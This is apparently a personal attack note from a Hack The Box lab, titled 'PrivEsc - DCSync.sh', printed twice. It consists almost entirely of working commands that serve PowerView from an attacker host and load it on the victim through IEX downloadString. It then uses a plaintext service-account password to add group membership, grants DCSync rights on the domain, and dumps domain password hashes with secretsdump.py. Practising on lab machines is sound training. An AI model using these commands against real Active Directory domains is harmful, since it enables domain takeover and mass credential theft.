jsdryan/PrivEsc - DCSync.sh

## PrivEsc - DCSync.sh
# Attack machine
git clone https://github.com/PowerShellMafia/PowerSploit/
cd /root/Repos/PowerSploit/Recon
python -m SimpleHTTPServer 80

# Vimtim
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.45:5555/PowerView.ps1')
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
net group 'Exchange Windows Permissions'

# Attack machine
secretsdump.py svc-alfresco:s3rvice@10.10.10.161
	# Attack machine
	git clone https://github.com/PowerShellMafia/PowerSploit/
	cd /root/Repos/PowerSploit/Recon
	python -m SimpleHTTPServer 80

	# Vimtim
	IEX(New-Object Net.WebClient).downloadString('http://10.10.14.45:5555/PowerView.ps1')
	Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() \| ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
	net group 'Exchange Windows Permissions'

	# Attack machine
	secretsdump.py svc-alfresco:s3rvice@10.10.10.161